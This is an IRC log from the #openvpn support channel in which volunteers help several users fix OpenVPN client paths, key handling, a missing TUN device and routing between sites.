lickalott> and that's already accomplished. I have all the crt and key files that I need. I will be the only person using the vpn 13:56 < EugeneKay> Eh, if you can get the keys to the clients securely(SSH, say), it's "OK" to generate the client.key at the CA. 13:56 < lickalott> WTF! I just hit start now to see if I could grab you guys some logs and it started. 13:56 < EugeneKay> But that's a philosophical difference. 13:57 < lickalott> only thing i changed was TAP vs TUN 13:57 < rob0> sure, it's "okay", but it's not proper. I don't want anyone else to have my keys. 13:58 < EugeneKay> That ends up depending upon how much separation of responsibiltiy you have :-p 13:59 < lickalott> pekster you said that the XML-RPC is a product of the AS right? 13:59 < rob0> So, one user of this VPN. Where will you be coming (connecting) from? Possibly a static key tunnel is good enough. And why tap? That's generally a bad idea. 
14:00 < lickalott> mainly from work. TAP; I was just following this (http://blog.johnso.org/2009/08/how-to-setup-openvpn-in-tomato.html) to try and get it to work. 14:00 <@vpnHelper> Title: Hacks and Slash: How to Setup Openvpn in Tomato (at blog.johnso.org) 14:00 < pekster> lickalott: That error you had before was with the "Access Server" GUI. I've never used it before, but enough text was shown behind your error message to confirm that. That client will *not* connect to the open-source OpenVPN system. It's a completely different method to connect, requring you to run the commercial code everywhere 14:00 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 276 seconds] 14:01 < lickalott> installed this - openvpn-client (desktop).msi 14:01 < pekster> Nope, wrong thing 14:01 < pekster> !download 14:01 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 14:01 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 14:03 < rob0> Possibly your best bet is to focus on learning the quirks of your Tomato OS, and then you can use the regular OpenVPN howto and documentation. 14:03 < rob0> If you really do want to use AS, again, this is not the place for it. 14:04 < rob0> Decide which one you are going to try and go to only that channel. 14:04 < lickalott> idc if it's AS. I just want to be able to access my stuff while at work. 14:05 < pekster> the .msi is AS; the GPL code does not provide an msi installer 14:05 < rob0> Answers you get here will be for GPL openvpn ("community version".) 
They might not be correct for AS, and vice versa. 14:05 < rob0> so do that first: choose. 14:06 < lickalott> my choice is; listening to pekster and rob0 14:06 < lickalott> ;D 14:06 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [] 14:07 < lickalott> here's the honest truth... i don't know enough about this (even after reading) to make an informed decision on a topic like that. 14:07 < lickalott> my !goal = get it to work preferrably from the router and staying with my current setup as a backup measure. 14:07 < lickalott> installing http://swupdate.openvpn.org/community/releases/openvpn-install-2.3.0-I001-x86_64.exe 14:08 < lickalott> i remember issues with this yesterday. lemme run it up again and remember what the problem was. 14:08 < rob0> um, that looks like a Windows .exe 14:08 < lickalott> above all else, I appreciate you guys putting up with me. 14:08 < lickalott> yeah... i'm trying to get a suitable client GUI to test the connection. 14:09 < lickalott> is that not what I want? 14:09 * lickalott stops installing 14:09 < pekster> rob0: Ye,a that's the official installer 14:09 < pekster> lickalott: NO, that's completely correct 14:09 < pekster> s/O/o/ 14:09 < lickalott> kk 14:10 -!- module000 [~module000@254.sub-70-196-34.myvzw.com] has left #openvpn [] 14:11 < lickalott> either of you use usenet? 14:11 < pekster> That tomato-based guide you posted is, IMO, also full of as much fail as the first two you tried yesterday. You probably don't want tap, and you likely don't want a static keyed setup either since addressing has to be manually handled on the client 14:11 < lickalott> *may be able to trade goods for services.... 14:12 < pekster> I'll 2nd rob0's suggestion of learning openvpn based on the howto, and then learning how tomato expects you to use openvpn after you understand the basics. You're trying to do 2 things at once that you've never done before, and it's not helping you do either of them well 14:13 < lickalott> k. 
so focus on an entire setup (based off of the howto page) on the ubuntu rig first, then migrate over to the router once I've learned more? 14:13 < pekster> In fact, you can get your feet wet with openvpn on your existing server where you get a proper environment. Then, we you have the skills to set up a working openvpn server, port your config to tomato through its interface 14:13 < pekster> Yea, we basically just said the same thing :) 14:13 < lickalott> right...just clarifying 14:13 < lickalott> kk 14:14 < lickalott> i'll do that. 14:16 < lickalott> so, the usenet thing? yay or nay? 14:21 < rob0> I have not been on Usenet in many years. 14:22 < pekster> usenet : early 90's :: dev&user maillists : now 14:22 < pekster> As far as I'm concerened 14:22 < pekster> I'll leave the rest for pioneers of web evolution to figure out 14:26 < lickalott> there is a mass DMCA push right now, but i've found a server that doesn't play by the rules as well as a good nzb site to pull from. I was going to offer invites (when they hit) to you guys if you still/currently used it. 14:26 < lickalott> should've been a comma in there somewhere 14:26 < pekster> Not really on topic for here 14:26 < lickalott> btw: half way through the set up and there are already correlations being made... 
+1 for tough love 14:26 < lickalott> rog (topic) 14:27 < lickalott> rog = roger that 14:29 -!- emmanuelux [~emmanuelu@94.23.150.162] has quit [Ping timeout: 256 seconds] 14:45 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 14:59 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Remote host closed the connection] 15:04 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 15:04 < hg_5> hello, what is wrong i have openvpnserver, when other router is connected to it, all is fine, but when i will connect to it from my pc, router load cpu is about 96% ;o 15:06 < pekster> If you're pushing traffic, it doesn't sound like anything is wrong. Encryption costs CPU time, and many routers have relatively weak CPUs 15:20 < lickalott> pekster i'm trying to configure the client gui (client.ovpn). The keys on my server are owned by root and in a dir that isn't shared out by NFS or samba (and I think it needs to be that way). Do i grab the keys i've generated for client1 over to my windows machine or do i have to generate keys locally? 15:22 < pekster> You can either transfer the keys over (just have root copy them somewhere that your normal user can acccess, chown them to the user, and use scp, NFS, Samba, or whatever to copy them 15:22 < lickalott> k 15:22 < pekster> Optionally you can generate keypairs on your client, send the CSR to the CA, have the CA sign it, and return the signed certificate to the client; that's a bit more complex 15:23 < pekster> (moreso because easy-rsa under Windows doesn't yet support keypair generation apart from the CA's PKI) 15:36 -!- amir_ [~amir@unaffiliated/amir] has joined #openvpn 15:47 -!- Burgundy [~burgundy@5-12-190-68.residential.rdsnet.ro] has quit [Remote host closed the connection] 15:50 < lickalott> still stuck. 
15:50 < lickalott> http://pastebin.com/CAz4Kw1R 15:50 < lickalott> thats the response I get when I try to initiate the service (client) and the portion of my .ovpn where I've called out the keys. 15:57 < lickalott> pekster, rob0 you see anything amiss with that ^^ 16:00 < pekster> Manpage has some hints for you just a couple pages down 16:04 < rob0> pekster, is it the need for double backslash? 16:07 < lickalott> added the [SPACE] and \\. no change. 16:09 < pekster> So yours looks like thte sample in the now? 16:09 < pekster> Where it says: For example on Windows, use double backslashes to represent pathnames: secret "c:\\OpenVPN\\secret.key" 16:10 < lickalott> true 16:10 < pekster> Spaces need no special handling besides quoting the entire path 16:11 < lickalott> http://pastebin.com/pubTBD77 16:11 < lickalott> oh... 16:11 < lickalott> cleaned up spaces. same 16:15 < pekster> And that means what exactly? 16:15 < lickalott> sry 16:16 < lickalott> took the [SPACE] out of all three entries and tried to initiate again. Same error appears 16:16 < pekster> So you have a folder called "ProgramFiles" in addition to the standard "Program Files" ? That's strange... 16:17 < lickalott> now I'm confused.... 16:17 < lickalott> [14:10] Spaces need no special handling besides quoting the entire path 16:17 < lickalott> ca "C:\\Program Files\\OpenVPN\\bin\\ca.crt" 16:17 < lickalott> is that not correct? 16:17 < pekster> That is. You said something different a moment ago 16:18 < pekster> Is it in that folder? openvpn\bin\ is a non-standard spot for the files as they usually go in config\ 16:18 < lickalott> i was referring to this - \[SPACE] Pass a literal space or tab character, don't 16:18 < lickalott> interpret it as a parameter delimiter. 
16:18 < pekster> Only if you don't quote things 16:18 < pekster> See: 16:18 < pekster> !sample 16:18 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see !man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting 16:18 < lickalott> yes they are in that folder. 16:18 < pekster> Oh, no, not that link 16:20 < lickalott> let me ask this... should the .ovpn file have an icon that links it to openvpn.exe? 16:20 < lickalott> right now it has no default program associated to it. 16:21 < lickalott> the reason I'm asking is; if I put the files into the config dir (which I did in the beginning) I have to type "openvpn.exe ../config/client.ovpn" 16:33 < pekster> The "icon" doesn't link anything, although that's besides the point. By default it'll open with notepad IIRC, although I thought newer versions had a context entry too 16:34 < lickalott> then i'm lost... idk where to go from here. 16:34 < lickalott> would the entire file help if I pastebin'd it? 16:34 < lickalott> well..let me ask this way. Would you be willing to peruse it if I posted it 16:35 < pekster> Remove comments and whitespace first please, and paste the error generated unless it is literally and completely identical to the one in your earlier output 16:36 < pekster> In fact, paste the error anyway, because it's citing a relative path in your last output 16:36 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 16:38 < lickalott> http://pastebin.com/SRThSDub 16:38 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 16:40 < lickalott> the only difference I see (based on the !sample link) is the user and group. 
But that shouldn't matter for initialization right? 16:41 < pekster> Your path is still relative 16:41 < pekster> That's not what the error should produce for that config file 16:42 < pekster> An absolute path produces something like this in error: Options error: --ca fails with 'D:\Apps\OpenVPN\config\auth-client\badca.crt': No such file or directory 16:44 < lickalott> relative as in relative vs absolute or relative as in that could still be an issue? 16:45 < pekster> relative path. Compare the error messages and it should be obvious 16:45 < pekster> Either your config has another "cert" and "key" entry that you didn't include in your paste, or you're referencing the wrong config file 16:47 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has quit [Read error: Operation timed out] 16:48 -!- mattock [~mattock@openvpn/corp/admin/mattock] has quit [Read error: Operation timed out] 16:48 -!- yuri__ [~cek@crius.pantheon.fused.net] has quit [Ping timeout: 276 seconds] 16:49 < lickalott> pekster http://tinypic.com/r/3586zwm/6 16:49 <@vpnHelper> Title: Image - TinyPic - Free Image Hosting, Photo Sharing & Video Hosting (at tinypic.com) 16:49 < lickalott> shot of my dir 16:53 < lickalott> am I missing something obvious?? 16:53 < pekster> Apparently. I've told you that your path is invalid based on the configuration you're referencing 16:55 < lickalott> i don't understand how though. It's the absolute path to the files. ALL of the files that i'm working with are in that directory (for now) 16:55 < pekster> Apparently not 16:55 < pekster> "Options error: --cert fails with 'client.crt': No such file or directory" 16:55 < pekster> Where it says 'client.crt' is not a valid path 16:55 * lickalott faceplams 16:56 < lickalott> i need to take a break... that was a stupid oversight on my part. 
16:57 * lickalott knows pekster is nodding "yep" 16:59 -!- yuri__ [~cek@crius.pantheon.fused.net] has joined #openvpn 17:03 -!- yuri__ [~cek@crius.pantheon.fused.net] has quit [Ping timeout: 256 seconds] 17:26 -!- raidz_away [~raidz@raidz.im] has joined #openvpn 17:26 -!- raidz_away is now known as raidz 17:26 -!- raidz [~raidz@raidz.im] has quit [Changing host] 17:26 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 17:26 -!- mode/#openvpn [+o raidz] by ChanServ 17:29 -!- walp [~nobody@unaffiliated/walp] has quit [Quit: leaving] 17:33 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 17:33 -!- mode/#openvpn [+o mattock] by ChanServ 18:05 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 252 seconds] 18:12 -!- storrgie [~storrgie@c-98-224-170-69.hsd1.mi.comcast.net] has joined #openvpn 18:13 < storrgie> I'm looking at some router devices.. some have hardware accel for encryption and some dont. With OpenVPN is this a _necessary_ thing for both the clients and the server... or is it essential for just the server? I could run the server on a VM someplace on a Xeon and just have the clients be Mikrotik routers. 18:15 < pekster> "Necessary" is relative to what your expectations are. Without usable hardware crypto, the in-software openssl functions are used to perform the actual crypto; since openvpn is single-threaded at present, that defines an upper-bound on how fast you can process crypto operations 18:16 < storrgie> but, I think what you're saying is that both ends are going to have equal 'heavy lifting' in this process 18:17 < pekster> Per-clienet, yes. A server supporting multiple clients has to do crypto for all of the clients' traffic, naturally 18:17 < storrgie> have you had any experience with mikrotik devices? 18:17 < pekster> Nope. I have done openvpn on an Asus WL-500gPv2 18:18 < storrgie> I cant figure out what processor is in that 18:19 < storrgie> oh, broadcom 240mhz 18:19 < storrgie> so... 
did you notice any slowdown by running it on this device? 18:19 < pekster> Compared to what, a PC? Sure, but I don't need to push 100Mbps or anything 18:20 < storrgie> yeah I'm trying to link sites that are 27mbps/7mbps 18:21 < pekster> My dev unit (the 500gPv2) may or may not be in a bootable state, but let me see if I can fire it up real quick for a "rough" test using a bulk transfer of some sort 18:21 < storrgie> I'm curious... can I use openvpn to link specific types of requests... say, the clients at site 1 go to the internet through site 1 modem... but when they make a request for server.site2 they go through the openVPN tunnel? 18:21 < storrgie> pekster, oh don't worry about doing any work for me 18:21 < pekster> Maybe not 27Mbps, but I used this same 500gPv2 unit to connect perma-remote employees last office gig I had, and they were good enough for email/bulk file transfers to the main office in another state 18:21 < storrgie> I'm just asking hypotheticals 18:21 < pekster> k 18:22 < pekster> You can do policy routing all you want, although it's up to you to set that up 18:22 < storrgie> but you can do policy routing... so that only requests to to specific site2 resources will actually go over the openvpn 18:22 < pekster> Yup 18:23 < pekster> You don't need policy routing for that even 18:23 < storrgie> that is excellent 18:23 < pekster> Just set routes for the destinations reachable across the tunnel 18:23 < storrgie> (I've never set it up before... 
just been wanting to do it) 18:23 < pekster> policy routing is when you need to handle routing decisions on more complex attributes, like source network or source VLAN/interface, etc 18:24 < pekster> Normal routing works as you'd expect with an extra "interface" as it were; openvpn makes it easy to exposes that to your clients: 18:24 < pekster> !route 18:24 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 18:24 < pekster> also: 18:24 < pekster> !serverlan 18:24 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 18:26 < storrgie> woof 18:26 < storrgie> setup of openvpn is quite an ordeal 18:26 < storrgie> I'm actually running it right now on a pfsense box 18:26 < storrgie> and I was quite perplexed about getting it configured 18:26 < pekster> If you haven't seen the official site/docs: 18:26 < pekster> !howto 18:26 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! 
or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 18:27 < storrgie> Well I really appreciate you fielding my questions 18:27 < storrgie> I want to run mikrotik stuff because i like the price and the form factor 18:27 < storrgie> I'm used to pfsense 18:27 < storrgie> but I'm running it on a 1u supermicro at my house and its just insane loud 18:28 < storrgie> I would like to switch to a fanless or virtually silent device 18:29 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 19:20 -!- storrgie [~storrgie@c-98-224-170-69.hsd1.mi.comcast.net] has quit [Quit: Leaving] 19:53 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 20:02 -!- AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 276 seconds] 20:08 -!- JackWinter [~jack@vodsl-4655.vo.lu] has quit [Ping timeout: 252 seconds] 20:10 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 20:20 -!- qmr [~qmr@50.116.18.140] has joined #openvpn 20:20 < qmr> trying to set up a VPN server with static key howto .. openvpn start fails, how / where can I get debugging information? 20:24 < rob0> well, maybe this is nitpicky, but with static keys, there IS no server/client, just "peers". 
20:24 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Read error: Operation timed out] 20:24 < rob0> Try running it from the command line without your distro init script, and without --daemon 20:25 < rob0> comment out "daemon" if it is in your config 20:25 < rob0> !logs 20:25 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 20:25 < rob0> !logfile 20:25 <@vpnHelper> "logfile" is (#1) openvpn will log to syslog if started in daemon mode. You can manually specify a logfile with: log /path/to/logfile or (#2) verb 3 is good for everyday usage, verb 5 for debugging or (#3) see --daemon --log and --verb in the manual (!man) for more info 20:25 < qmr> ok, openvpn openvpn.conf gave some useful output 20:26 < qmr> Sun Feb 10 21:25:25 2013 Note: Cannot open TUN/TAP dev /dev/net/tun: No such file or directory (errno=2) 20:26 < rob0> "modprobe tun" 20:26 < rob0> it IS Linux, right? 20:26 < qmr> no such module ... 20:26 < qmr> http://www.youtube.com/watch?v=bW7Op86ox9g 20:26 <@vpnHelper> Title: DUN-DUN-DUUUUN!!! Sound Effect - YouTube (at www.youtube.com) 20:26 < qmr> Thanks rob0 20:27 < rob0> why no tun? 20:27 < qmr> hell if I know. this is an old almost forgotten about VPS. just noticed it has samba, bind, and apache installed. not sure if compromised or crappy template 20:28 < qmr> 2.6.32-042stab059.7 o_O 20:28 < rob0> Some VPSs have crappy custom kernels without modules. 20:29 < rob0> (made by people who had no idea you'd want such a thing, most likely) 20:29 < qmr> the provider's FAQ says it's enabled on all plans or whatever -_- 20:30 < pekster> Say what's embedded? CONFIG_TUN in the kernel? 
20:31 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 20:32 < qmr> not sure how I would see that. doesn't look like config is exposed in /proc/config.gz 20:32 < rob0> That sucks. 20:36 -!- zz_AsadH [~AsadH@irc.unixio.com] has joined #openvpn 20:36 -!- zz_AsadH is now known as AsadH 20:36 -!- AsadH [~AsadH@irc.unixio.com] has quit [Changing host] 20:36 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 20:40 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 255 seconds] 20:49 < qmr> okies, opened a ticket with them. kind of curious how I have used 650MB of xfer since I never log in there ... hm 21:30 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 21:33 -!- Siner [~chatzilla@c-98-255-2-163.hsd1.ca.comcast.net] has joined #openvpn 21:37 < Siner> Hi, hopefully I'm not breaking etiquette or missing something obvious in the topic. I am attempting to help an Australian friend of mine (I am in the US) tunnel traffic. We tried originally just hosting a local FreeSSHd server on my machine and connecting via putty, but we kept running into problems. 21:37 < Siner> I now have an instance of OpenVPN hosted on a linode 21:37 < Siner> I've followed linodes guide to setting it up 21:37 < Siner> but I can't figure out for the life of me how I am supposed to connect and forward traffic through it. 21:38 < Siner> Most of the guides I find are related to actually setting up the OpenVPN server, but they seem to just gloss over how you connect. 21:38 < Siner> !welcome 21:38 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. 
|| Also interesting: !man !/30 !topology !iporder !sample !forum 21:39 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 21:40 < pekster> Siner: start here, with the official openvpn howto: 21:40 < pekster> !howto 21:40 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 21:41 < pekster> How you forward traffic depends on what exactlly your goal is. Are you trying to reach systems behind either one of the peers? Redirect all Internet-bound traffic across the VPN? etc. In effect: 21:41 < pekster> !goal 21:41 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 21:43 < Siner> Ah, goal (seems silly) is to redirect minecraft traffic to a US IP in an attempt to solve apparent one-way lag. His packets seem to reach the server instantly, but it takes ages for things to happen on his end. 21:43 < Siner> I suppose this could be accomplished by redirecting all internet traffic across the VPN 21:44 < pekster> You can route anything from a single host to the whole of the Internet across a tunnel; it's just a route that comes up/down with the VPN connection 21:45 < Siner> So we could do: AussiePC -> Linode -> Minecraft Server and vice versa? 21:45 < pekster> First you need a working tunnel where you can ping endpoints. From there you can push a route to whatever you're trying to expose on the server-side; you'll probably need NAT too if you're dealing with IPv4 private addresing, unless you have public IPs for the VPN range 21:46 < pekster> The howto I linked earlier will get you a working VPN, where you can ping. You must get that working first, or nothing else will work. 
Then, read about handling routes: 21:46 < pekster> !route 21:46 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 21:46 < Siner> You just blew my mind. I'll do some reading on the howto, and then maybe I can ask better/more specific questions if I'm still having problems. Thanks for your help and patience. 22:37 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 22:44 -!- xbanux [~xbanux@115.254.75.113] has joined #openvpn 22:55 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] --- Day changed Mon Feb 11 2013 01:03 -!- b1rkh0ff [~b1rkh0ff@178.77.24.133] has quit [Read error: Operation timed out] 01:03 -!- gedO [~quassel@88.119.154.240] has joined #openvpn 01:19 -!- b1rkh0ff [~b1rkh0ff@178.77.7.226] has joined #openvpn 01:39 -!- gedO_ [~quassel@88.119.154.240] has joined #openvpn 01:39 -!- gedO [~quassel@88.119.154.240] has quit [Ping timeout: 252 seconds] 01:49 -!- gedO_ [~quassel@88.119.154.240] has quit [Ping timeout: 276 seconds] 01:56 -!- gedO [~quassel@2002:5877:9af0:1000:3978:6c96:5f0b:5e20] has joined #openvpn 02:41 -!- yavor is now known as y4h0 03:14 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 03:19 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:19 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 03:20 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Remote host closed the connection] 03:22 -!- tMobile4a03 [T4@n218250226180.netvigator.com] has joined #openvpn 03:23 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 03:23 -!- tyteen4a03 [T4@n218250226180.netvigator.com] has quit [Read error: 
Connection reset by peer] 03:26 -!- TheLaw [~law@irc.l4w.info] has quit [Ping timeout: 276 seconds] 03:26 -!- Siner [~chatzilla@c-98-255-2-163.hsd1.ca.comcast.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 18.0.2/20130201065344]] 03:38 -!- sam1 [~sam@194-236-182-101.customer.telia.com] has joined #openvpn 03:40 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 03:48 -!- yuri__ [~cek@crius.pantheon.fused.net] has joined #openvpn 03:50 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 03:50 -!- mode/#openvpn [+o krzee] by ChanServ 03:56 -!- dazo_afk is now known as dazo 04:03 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 04:04 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 04:36 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 04:53 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 05:00 -!- ade_b [~Ade@195.198.34.212] has joined #openvpn 05:00 -!- ade_b [~Ade@195.198.34.212] has quit [Changing host] 05:00 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 05:00 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 05:19 -!- william_ [~x@lotus.redl8.com] has quit [Ping timeout: 256 seconds] 05:39 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 252 seconds] 05:50 -!- Devastator [~devas@unaffiliated/devastator] has quit [] 05:51 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 06:02 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 245 seconds] 06:04 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 06:05 -!- ParkerJ [~Parker@194.81.239.72] has joined #openvpn 06:09 < ParkerJ> Hello all. I have openvpn set up so users can access a bzr server. Now I'd like to allow the users to use gobby (a collaborative editor) but they can't ping each other via their vpn IPs. 
What part of the config do I need to change? 06:09 < ParkerJ> Thanks for any tips. 06:13 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 06:14 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 276 seconds] 06:14 -!- william_ [~x@lotus.redl8.com] has joined #openvpn 06:14 < ParkerJ> server.conf http://pastebin.com/kG05FNwN 06:14 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 06:17 -!- p3rror [~mezgani@2001:0:53aa:64c:3853:4c1b:d606:f491] has joined #openvpn 06:18 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Ping timeout: 246 seconds] 06:20 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 06:22 -!- hg_5__ [~chatzilla@91.234.245.245] has joined #openvpn 06:22 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 264 seconds] 06:25 -!- cpm_ [~Chip@50.149.28.79] has joined #openvpn 06:25 -!- cpm_ [~Chip@50.149.28.79] has quit [Changing host] 06:25 -!- cpm_ [~Chip@pdpc/supporter/active/cpm] has joined #openvpn 06:26 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Ping timeout: 260 seconds] 06:39 < ParkerJ> !welcome 06:39 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 06:39 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 06:40 < ParkerJ> !redirect 06:40 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. 
or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 06:40 <@vpnHelper> http://ircpimps.org/redirect.png 06:45 -!- cpm_ [~Chip@pdpc/supporter/active/cpm] has quit [Ping timeout: 245 seconds] 06:46 < ParkerJ> !def1 06:46 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 06:47 < ParkerJ> !ipforward 06:47 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 06:48 < ParkerJ> !route 06:48 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 06:58 -!- p3rror [~mezgani@2001:0:53aa:64c:3853:4c1b:d606:f491] has quit [Remote host closed the connection] 07:03 -!- master_of_master [~master_of@p57B547BB.dip.t-dialin.net] has quit [Ping timeout: 256 seconds] 07:05 -!- master_of_master [~master_of@p57B52D17.dip.t-dialin.net] has joined #openvpn 07:11 < ParkerJ> I think I have found what I was looking for: client-to-client Waiting for another client to turn up so I can try it out. 07:38 < sam1> any reason for tls error when using tls auth in windows? 
